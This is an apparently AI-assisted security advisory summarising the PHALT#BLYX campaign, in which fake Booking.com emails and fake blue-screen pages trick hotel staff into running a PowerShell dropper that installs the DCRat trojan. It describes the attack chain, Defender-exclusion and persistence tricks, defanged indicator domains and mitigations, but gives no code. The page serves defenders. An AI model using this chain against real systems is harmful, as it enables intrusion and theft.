top of page
perceptive_background_267k.jpg

Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat

Published:

6 January 2026 at 12:13:00

Alert date:

6 January 2026 at 13:02:38

Source:

thehackernews.com

Click to open the original link from this advisory

Ransomware & Malware, Email & Messaging, Enterprise Applications

Cybersecurity researchers have disclosed a new campaign called PHALT#BLYX targeting the European hospitality sector. The campaign uses fake booking emails to redirect hotel staff to fraudulent blue screen of death (BSoD) pages. These pages employ ClickFix-style social engineering lures that trick victims into downloading and executing malicious code. The ultimate objective is to deliver DCRat, a remote access trojan that provides attackers with persistent access to compromised systems. The multi-stage attack specifically targets hotel staff who are likely to receive booking-related communications.

Technical details

The PHALT#BLYX campaign uses ClickFix-style lures displaying fake BSoD errors. Attack chain: 1) Phishing email impersonating Booking.com with link to fake website 2) Fake CAPTCHA page leading to bogus BSoD with recovery instructions 3) PowerShell dropper downloads MSBuild project file (v.proj) from 2fa-bns[.]com 4) MSBuild.exe executes embedded payload that configures Microsoft Defender exclusions, sets up persistence in Startup folder, and launches DCRat. The malware can disable security programs with admin privileges or trigger UAC prompts every 2 seconds. Opens legitimate Booking.com page as distraction. DCRat is a .NET trojan with plugin-based architecture for keylogging, command execution, and additional payload delivery including cryptocurrency miners.

Mitigation steps:

Monitor for suspicious MSBuild.exe executions, implement email filtering for fake Booking.com emails, watch for Microsoft Defender exclusion modifications, detect PowerShell commands downloading remote content, monitor for persistence mechanisms in Startup folder, be alert for repeated UAC prompts, implement user awareness training about fake BSoD pages and ClickFix lures.

Affected products:

Microsoft Defender Antivirus
MSBuild.exe
Windows
Booking.com (impersonated)

Related links:

https://thehackernews.com/2025/08/clickfix-malware-campaign-exploits.html
https://en.wikipedia.org/wiki/Blue_screen_of_death
https://thehackernews.com/2024/09/new-html-smuggling-campaign-delivers.html
https://www.securonix.com/blog/analyzing-phaltblyx-how-fake-bsods-and-trusted-build-tools-are-used-to-construct-a-malware-infection/
https://thehackernews.com/2025/03/cert-ua-warns-dark-crystal-rat-targets.html

Related CVE's:

Related threat actors:

IOC's:

low-house[.]com, 2fa-bns[.]com, v.proj

This article was created with the assistance of AI technology by Perceptive.

About us

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: Deze website toont informatie afkomstig van externe bronnen. Perceptive aanvaardt geen verantwoordelijkheid voor de inhoud, juistheid of volledigheid van deze informatie.

bottom of page